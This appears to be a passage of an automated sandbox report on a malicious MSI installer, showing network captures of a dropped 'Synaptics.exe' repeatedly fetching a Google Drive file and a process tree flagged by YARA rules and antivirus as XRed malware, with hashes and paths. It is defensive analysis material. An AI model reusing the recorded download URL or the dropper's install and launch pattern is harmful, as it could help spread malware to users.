                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-P6BIK4_a_kJMvLuYgmhBbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
18  192.168.2.9  49832  142.250.186.78  443  1360  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-30 10:49:24 UTC  143  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:24 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ur9_tHGovhgHWFNtexdCyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 49831 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:24 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
2024-12-30 10:49:24 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4S5g4t3SWXij-KClfUemaXlB8_rsvtspU9fV1I3vaG3hveboCsX_eMR7Zi-p1gUS32IPQaGxM
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jwYAdiakL0FSGzT3UMPO5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
2024-12-30 10:49:24 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:49:24 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ATg1pzZefGsieIgU61cyHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:49:24 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 49844 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
2024-12-30 10:49:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4Yg-_WH4y30xhRrrEG3jTfvLYeNTooJW30ylJ6Iggtz7UblDYnQWJJsqU-757OIJ0y
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HZlhWaCROmmg7RIlfcTmyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
2024-12-30 10:49:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="_Etu55JPF2_F7FaP9cRAEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:39 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 49843 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
2024-12-30 10:49:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC50BE3-2LStuuc5rp9xFH-Pn9KVXI6x6tMBqiT5Zxc4yHbyNJgYC0wycPhnaXkAwrDF
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kJNzl2MIYswmXG7sa4wXVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
2024-12-30 10:49:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:49:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="s4AnIHpgyUD3pZ32q3JhUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:49:39 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49842 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HtienGDzWbyqaH1zQR3Bgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 49841 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
2024-12-30 10:49:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-H8e8ke0pHi6G7GPzYCx9qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Target ID:1
                                                                                                        Start time:05:49:09
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\xyxmml.msi"
                                                                                                        Imagebase:0x7ff658290000
                                                                                                        File size:69'632 bytes
                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:05:49:09
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                        Imagebase:0x7ff658290000
                                                                                                        File size:69'632 bytes
                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:3
                                                                                                        Start time:05:49:10
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\Installer\MSID754.tmp
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Installer\MSID754.tmp"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'729'536 bytes
                                                                                                        MD5 hash:1D2237FAF8E6198625010CB580280901
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:05:49:11
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                        Imagebase:0x400000
                                                                                                        File size:771'584 bytes
                                                                                                        MD5 hash:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:05:49:12
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                        Imagebase:0x930000
                                                                                                        File size:53'161'064 bytes
                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:9
                                                                                                        Start time:05:49:22
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:771'584 bytes
                                                                                                        MD5 hash:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:12
                                                                                                        Start time:05:49:24
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 3728
                                                                                                        Imagebase:0xca0000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:17
                                                                                                        Start time:05:51:14
                                                                                                        Start date:30/12/2024
                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                                        Imagebase:0x7ff6c55b0000
                                                                                                        File size:163'840 bytes
                                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        No disassembly